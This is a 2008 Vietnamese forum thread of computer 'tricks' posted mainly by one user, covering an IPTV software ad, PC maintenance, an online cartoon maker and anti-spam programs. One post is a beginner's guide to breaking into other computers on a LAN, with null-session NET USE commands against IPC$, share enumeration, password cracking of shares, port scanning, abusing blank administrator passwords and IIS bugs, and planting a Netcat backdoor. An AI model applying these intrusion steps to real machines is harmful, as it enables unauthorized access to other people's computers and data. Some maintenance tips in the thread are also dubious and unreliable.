- Hỗ trợ các chức năng tìm kiếm nâng cao, sử dụng dễ dàng, nhanh chóng và hiệu quả cao

- Bộ nhớ hoàn chỉnh với tất cả các kênh truyền hình.

- Xác định vị trí nhanh chóng các kênh ưa thích.

- Đơn giản và dễ sử dụng hơn tất cả các chương trình xem truyền hình khác.

- Phương tiện xem truyền hình hiện đại: Không phải dụng card TV như những phương tiện truyền thống.

- Kết nối nhanh chóng: chỉ cần bạn kết nối Internet là bạn đã có thể theo dõi các kênh truyền hình ở tất cả mọi nơi trên thế giới.

- Phương tiện giao lưu bổ ích: Bạn còn có thể cùng trao đổi với bạn bè khắp năm châu về những quan điểm và sở thích chung.Ngoài ra, bạn còn có thể tiết kiệm được khoảng thời gian quý báu trong cuộc sống của mình mà không phải vất vả tìm kiếm các kênh yêu thích của mình với cách thức khó khăn và tốn thời gian như trước đây nữa. Với các tiện ích của ChrisTV Online bạn hãy truy cập và đăng kí những kênh phổ biến hay những kênh mà bạn yêu thích, hàng ngày chương trình sẽ update cho máy của bạn theo yêu cầu. Như vậy, là ngày nào bạn cũng có thể tận hưởng cuộc sống của mình với tất cả những kênh mà mình yêu thích, cùng hoa mình vào dòng người đang truy cập trên khắp địa cầu.


Ngay khi sử dụng chương trình bạn sẽ nhận thấy ngay chức năng tìm kiếm rất đơn giản. Bạn có thể tìm kiếm theo quốc gia, chương trình sẽ hiển thị giúp bạn các kênh truyền hình của nước đó và còn nhiều chức năng hiện đại khác.Tất nhiên là đầu tiên bạn hãy dùng thử phiên bản mới này để dánh giá. ChrisTV Online có phần mềm miễn phí cho phép bạn thử nghiệm trong thời gian là 14 ngày. Điều đặc biệt là trong 14 ngày này bạn có thể được sử dụng miễn phí tất cả các chức năng của chương trình với tất cả các kênh truyền hình và âm nhạc, đó là điều khác biệt so với các phẩm mềm khác. Bởi không phải phần mềm nào cũng cho phép bạn dùng thử tất cả các chức năng của nó trong thời gian thử nghiệm. Sau thời gian đánh giá, nếu bạn muốn tiếp tục sử dụng ChrisTV Online, bạn chỉ cần đăng kí sử dụng sản phẩm với một trong hai cách thức dài hạn và ngắn hạn- Đăng kí với thời gian sử dụng dài hạn: ChrisTV Online sẽ cung cấp cho bạn tất cả các phẩm mềm và các kênh cơ sở dữ liệu trong toàn bộ thời gian bạn đăng kí.

- Đăng kí với thời gian sử dụng ngắn hạn: ChrisTV Online sẽ cung cấp các chương trình và các kênh cơ sở dữ liệu của nó trong một năm bạn đăng kí.Chương trình tương thích với hệ điều hành Windows : 98/ME/2000/XP.

Các bạn có thể tìm mua đĩa cài chương trình ở các cửa hàng đĩa hoặc tải bản dùng thử của chương trình tại địa chỉ : http://www.chris-tv.com/online/download.html
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:21 am

Các bước cơ bản để đột nhập trong LAN


http://music.easyvn.com/bonamday/thuthuatinternet/NAHIEU.GIF

Có một số thắc mắc về các cách để thâm nhập vào một máy tính trong LAN của các bạn mới vào và các câu trả lời thường không được thống nhất, còn các tài liệu English thì các bạn ngại đọc.
Ðặc biệt là đối với các máy trong LAN không share resources, điều đó không có nghĩa là bạn không thể vào được. Dưới đây tôi sẽ giới thiệu sơ lược cho các bạn một vài cách thức cơ bản để kiểm tra và tìm cách đột nhập vào 1 máy tính trong LAN.
1- Kiểm tra IPC share:
IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng (NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC$, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C:\>NET USE \\TARGET\IPC$ "" /USER:""
C:\>NET USE \\TARGET\IPC$ * /USER:
C:\>NET USE \\TARGET\IPC$ * /USER:""
trong đó: target là computername hoặc IP của máy bạn muốn kết nối.
Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.
Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C:\>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử crack chúng: Nat (NetBIOS Auditing Tool)...
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.
2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ: C:\telnet anhnguyen 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, ....
Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.
3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat...)đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó.
Trên đây chỉ là một số phương pháp sơ đẳng để giúp các bạn (newbie) hiểu được các cách thức có thể dùng để thâm nhập vào máy từ xa. Còn rất nhiều phương pháp khác mà tớ không liệt kê hết (vì không biết! hehe), các bạn sẽ từ từ tìm hiểm thêm.
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:30 am

10 bí quyết sử dụng máy tính bền lâu


1. Vệ sinh chung: Một trong những nguyên nhân phổ biến của tình trạng máy tính trở nên nóng hừng hực như lò lửa là do bụi bặm, cáu bẩn bám bên trong máy. Do đó, bạn cần giữ cho máy tính luôn sạch sẽ cả bên trong lẫn bên ngoài. Bạn nên dùng một cây cọ mềm để quét sạch các lớp bụi, cáu bẩn. Việc làm này cần được thực hiện tối thiểu một lần/năm.
2. Sử dụng ổn áp điện: Máy tính vốn rất nhạy cảm với những thay đổi đột ngột của cường độ dòng điện, chỉ cần một sự cố về điện đột ngột như cúp điện, tăng điện, chập mạch… cũng có thể làm hỏng ổ cứng hay nổ bo mạch… Do đó, bạn nên trang bị cho máy tính một bộ ổn áp điện hay một bộ lưu điện - UPS càng tốt.
3. Tắt nguồn màn hình: Hầu hết các loại màn hình hiện nay đều có tính năng tắt tự động khi thoát khỏi hệ điều hành, nhưng như thế không có nghĩa là chúng không sử dụng điện, bằng chứng là công tắc màn hình vẫn sáng hoặc nhấp nháy. Thật ra màn hình chỉ đang “ngủ” và vẫn đang hoạt động (sử dụng điện để “ngủ”).
Nếu để tình trạng này xảy ra một thời gian dài, đèn hình sẽ bị yếu (đối với màn hình CRT) hoặc xuất hiện các điểm ảnh hỏng (đối với màn hình LCD). Do đó, bạn hãy chịu khó tắt nguồn màn hình mỗi khi không làm việc với máy tính nữa, để máy có thời gian nghỉ ngơi hồi phục “sức khỏe”.
4. Để hệ thống luôn hoạt động: Không giống như màn hình nên tắt hẳn mỗi khi thoát khỏi hệ điều hành, hệ thống máy tính luôn cần được hoạt động. Rất nhiều người đã không nhận ra rằng khởi động máy tính từ tình trạng “lạnh ngắt” của các bộ phận như: bộ nguồn, bo mạch, ổ cứng… sẽ làm suy giảm rất nhiều tuổi thọ của chúng. Bạn hãy tưởng tượng một cầu thủ ra sân thi đấu mà không khởi động thì liệu anh ta sẽ đá bóng được trong bao lâu?! Cách giải quyết ở đây là bạn nên cho máy tính ngủ ở chế độ Hibernation thay vì Shutdown hoàn toàn khi không làm việc với nó nữa.
5. Khám sức khỏe cho ổ cứng: Công việc này rất đơn giản, từ cửa sổ My Computer, bạn kích chuột phải lên biểu tượng ổ cứng muốn kiểm tra, chọn Properties\Tools\Check now. Bạn cũng có thể dùng các phần mềm chuyên nghiệp khác để kiểm tra kỹ hơn. Nếu chương trình phát hiện ổ cứng có nhiều lỗi hay bad sector thì bạn hãy ngay lập tức sao lưu các dữ liệu quan trọng rồi mới tiến hành sửa chữa.
6. Phòng chống virus: Bạn có thể sử dụng các chương trình thuộc hàng VN chất lượng cao như Bkav 2006, D32 (dung lượng nhỏ, hỗ trợ tiếng Việt) hay hàng ngoại như Norton Antivirus 2006, Panda Titanium 2006, Symantec Antivirus…
7. Kiểm tra pin CMOS: Cục pin bé tí này còn được gọi là pin nuôi vì dùng năng lượng của mình để “nuôi” các thông tin thiết lập trong Bios đảm bảo cho hệ thống có thể khởi động được. Để kiểm tra tình trạng pin nuôi, bạn chỉ việc để ý đồng hồ hệ thống, nếu thấy nó bắt đầu chạy chậm thì pin nuôi cũng sắp “tiêu” và bạn nên nhanh ***ng thay pin mới đi là vừa.
8. Cẩn thận khi mở thùng máy: Bất cứ khi nào bạn định mở thùng máy, hãy nhớ tắt nguồn và rút hẳn phích cắm điện ra khỏi ổ điện. Khi chạm vào các bộ phận bên trong thùng máy, bạn hãy để cơ thể mình trực tiếp nối đất hoặc thông qua một vật có khả năng dẫn điện nào đó hoặc đeo vòng khử tĩnh điện nhằm tránh làm hỏng các bo mạch do tương tác tĩnh điện.
9. Bảo trì chuột: Sau một thời gian sử dụng, chuột sẽ bị bám đầy bụi và cáu bẩn. Đối với chuột bi, bạn sẽ thấy sự di chuyển của nó không còn trơn tru như lúc mới mua mà bắt đầu “cà rịch cà tang” lúc đi lúc không, có khi nhảy lung tung. Để vệ sinh nó, bạn sử dụng một cái cạo nhỏ cạo cáu bẩn bám trên các thanh nhựa cuộn (phần tiếp xúc với bi), bánh xe cuộn, đồng thời dùng khăn lau chùi cả viên bi nữa. Đối với chuột quang, bạn chỉ việc cạo sạch bụi đất bám theo bánh xe cuộn là được.
10. Dọn dẹp Registry: Bạn thích vọc máy tính nên thường xuyên cài đặt, gỡ bỏ các chương trình thử nghiệm vào hệ thống. Sau một thời gian, bạn sẽ thấy hệ thống trở nên chậm chạp đến khó hiểu. Nguyên nhân chủ yếu là do thông tin của các ứng dụng đã gỡ bỏ vẫn còn tồn tại trong Registry và ngày càng nhiều thêm. Kết quả là Registry phình to ra với khá nhiều rác. Để quét sạch các thứ rác thải này, bạn nên dùng những phần mềm chuyên nghiệp như: Registry Mechanic, Tuneup Utilities 2006..
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:46 am

bước tạo phim hoạt hình trực tuyến


Bước 1: Đầu tiên, bạn truy cập vào địa chỉ www.dfilm.com/index_moviemaker.html, nhấn nút Start để bắt đầu việc khởi tạo đoạn phim. Màn hình chọn phối cảnh hiện ra, bạn chọn khung cảnh (background) và nền trời (spy) sao cho phù hợp với nội dung của đoạn phim mà bạn muốn tạo ra, nhấn chuột vào những dấu tam giác trong danh sách để thêm nhiều lựa chọn hơn. Nhấn Next để qua bước kế tiếp.
http://img413.imageshack.us/img413/8908/image002yw4.jpg
- Bước 2: Sau khi đã chọn phối cảnh, bạn tiếp tục chọn ngữ cảnh diễn xuất cho diễn viên. Website cung cấp cho bạn 4 ngữ cảnh bao gồm: cả hai nhân vật cùng tiến vào từ 2 phía và khi kết thúc đọc lời thoại di chuyển theo hai hướng khác nhau, hay di chuyển cùng một hướng hoặc bạn có thể chọn ngữ cảnh một nhân vật đứng độc thoại. Chọn xong, bạn nhấn Next để qua bước chọn diễn viên diễn xuất.
http://img413.imageshack.us/img413/9365/image004fw9.jpg
Bước 3: Trong bước này, bạn chọn diễn viên cho hai đối tượng (Chapter1 và Chapter2) trong đoạn phim của mình. Website cung cấp cho bạn khá nhiều diễn viên từ anh chàng cao bồi bảnh trai đến những chú lùn, từ những cô gái trông thật hiền hành đến những con ma đáng sợ. Chọn xong, bạn nhấn Next
http://img413.imageshack.us/img413/5461/image006ao8.jpg
Bước 4: Bước này là nơi để bạn thể hiện nội dung của đoạn phim, đó có thể là những lời tâm sự của bạn muốn gửi đến bạn bè hay là những lời tỏ tình thầm kín đến một người mà bạn yêu quý nhất. Các nhân vật ở đây sẽ thay phiên biểu lộ thông điệp của bạn đến người nhận, mỗi người đọc thoại ba lần. Chú ý: mỗi lời thoại giới hạn 100 ký tự.- Bước 5: Nhạc nền là thành phần rất quan trọng của bộ phim vì âm nhạc sẽ giúp bộ phim trở nên truyền cảm hơn, bạn có thể chọn những khúc nhạc đồng quê thật du dương đến những bản nhạc rock sôi động để tăng thêm phần hấp dẫn. Nếu như trong ngữ cảnh SCENE hiện tại này không thể chuyển hết thông điệp của bạn muốn thổ lộ, bạn có thể nhấn nút Add new scene để thêm các ngữ cảnh mới tiếp theo ngữ cảnh này và thực hiện tương tự như các bước trên. Sau khi chọn và nghe thử, bạn nhấn nút Finish Movie để kết thúc bộ phim

http://img409.imageshack.us/img409/9998/image008ht1.jpg
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:47 am

Các chương trình chống spam hay nhất


Trong phần này, bạn có thể tham khảo thông tin về ba chương trình diệt spam còn lại là K9 AntiSpam, Norton AntiSpam 2005 và SpamBayes.


Robin Kier K9 AntiSpamĐây là một chương trình miễn phí sử dụng phương thức Bayesian, giao diện đơn giản, được sử dụng khá nhiều hiện nay. Sau khi được cài đặt, chương trình sẽ trở thành một proxy và kết nối đến mail server của bạn. Bạn cần thiết lập chương trình email client của mình hỗ trợ POP3 (dạng như 127.0.0.1) và kết nối thông qua cổng TCP là 9999 (thay vì mặc định là 110). Tên tài khoản của bạn phải bao gồm máy kết nối tới.K9 AntiSpam có khả năng lọc rất mạnh. Nó dò tìm tất cả spam mail và xác định chúng. Tuy vậy, chương trình vẫn tải về máy với việc đánh dấu các spam ở phần cuối của tiêu đề email, cho phép bạn lựa chọn để xóa đi. Bạn cần tạo một quy luật để chương trình có thể thực hiện tự động điều này. K9 AntiSpam nhìn chung dành cho người dùng có trình độ kỹ thuật để cài đặt và sử dụng.Norton AntiSpam 2005Norton AntiSpam 2005 với nhiều tính năng mà các trình khác không có là lọc spam mail thông qua ngôn ngữ của nhiều quốc gia trong đó có cả Việt Nam. Tính năng này cho phép bạn nhận email có nội dung theo ngôn ngữ nào, ngôn ngữ nào không được cho phép. Norton AntiSpam cũng có khả năng “tự học” khá cao, thông qua công việc xác định spam mail với email thật của bạn. Chương trình sẽ tách riêng các spam mail, ghi nhớ dạng địa chỉ, nội dung, cấu trúc của nội dung, tăng cường khả năng lọc chính xác hơn.Giá cả tuy cao, nhưng hiệu quả hoạt động lại rất xuất sắc. Có khả năng tự cải thiện hiệu suất lọc và độ chính xác. Hỗ trợ hầu hết các trình email client như Outlook, Outlook Express, Eudora … Có thể tham khảo thêm thông tin về Norton AntiSpam 2005 tại đây.SpamBayesSpamBayes 1.0.4 được sử dụng rất rộng rãi không chỉ vì chương trình hoàn toàn miễn phí mà vì hiệu suất làm việc rất xuất sắc của SpamBayes dựa trên phương thức Bayesian nâng cao. SpamBayes giống CloudMark, đơn giản hơn ở tính năng, thực hiện lọc chậm chạp, lọc spam thông qua địa chỉ người gởi, nội dung của email và độc đáo với độ thông minh của mình qua việc tự nâng cao khả năng lọc spam rất chính xác.Nhược điểm của SpamBayes khi mới sử dụng là bạn cần phải xác định email trong mục cách ly vì chương trình sẽ đưa hầu hết email vào diện nghi ngờ. SpamBayes với những tính năng và hiệu quả khá cao, không thua kém bất kỳ chương trình chống spam thương mại nào, lại được cung cấp miễn phí nên được sử dụng rất phổ biến.Qua ba loạt bài viết, chắc hẳn bạn cũng tự chọn cho mình được một chương trình thích hợp để sử dụng. Tuy nhiên, dù có bất kỳ chương trình ngăn chặn, phòng chống nào cao cấp đi nữa, thì yếu tố con người vẫn là quyết định. Hãy tập tạo từ 2 đến 3 tài khoản email, sử dụng chúng theo từng mục đích. Những email quan trọng thì đừng bao giờ dùng chúng rộng rãi như gởi thiệp, đăng ký diễn đàn… và đừng mở bất kỳ email nào có những tiêu đề hấp dẫn, những tập tin đính kèm trông có vẻ hiền lành. Hãy kiểm chứng lại với người gởi những tập tin được gởi kèm từ họ, bạn sẽ không phải mất thời gian để đọc những email không mong muốn đó, cũng như sửa chửa cả hệ thống khi nhiễm phải spyware hay virus.
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by Hyu Liilo on Sun Aug 24, 2008 8:50 pm

Thanks ! Cũng vẫn còn làm đc :nherang

_________________
Thầy Trịnh Cán dạy Hoá lớp tớ ... Very Happy
Thầy năm nay mới 62 thôi mờk trông thầy vẫn còn "Ăn chơi" lém ... Very Happy

avatar
Hyu Liilo
Admin
Admin

Nam
Tổng số bài gửi : 1190
Age : 24
+ Nơi ở : Bạn thấy tui ở đâu thỳ tui ở đóa ...
+ Sở thích : Thick đi bụi ... :D
+ Tính tình : ? ? ?
+ Tên thật .... : Chưa update ...
+ Ước mơ của tớ là .... : Là 1 dancer ...
+ Đang học/làm việc tại .... : ... Tại gia ...
+ Câu nói ưa thích của tớ .... : ...v.v
Registration date : 05/01/2008

Character sheet
công lực:
100/100  (100/100)
kinh nghiệm:
1000/100  (1000/100)
nghề nghiệp.:

Xem lý lịch thành viên http://anhsaoxanh.net/

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by Sponsored content


Sponsored content


Về Đầu Trang Go down

Về Đầu Trang

- Similar topics

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết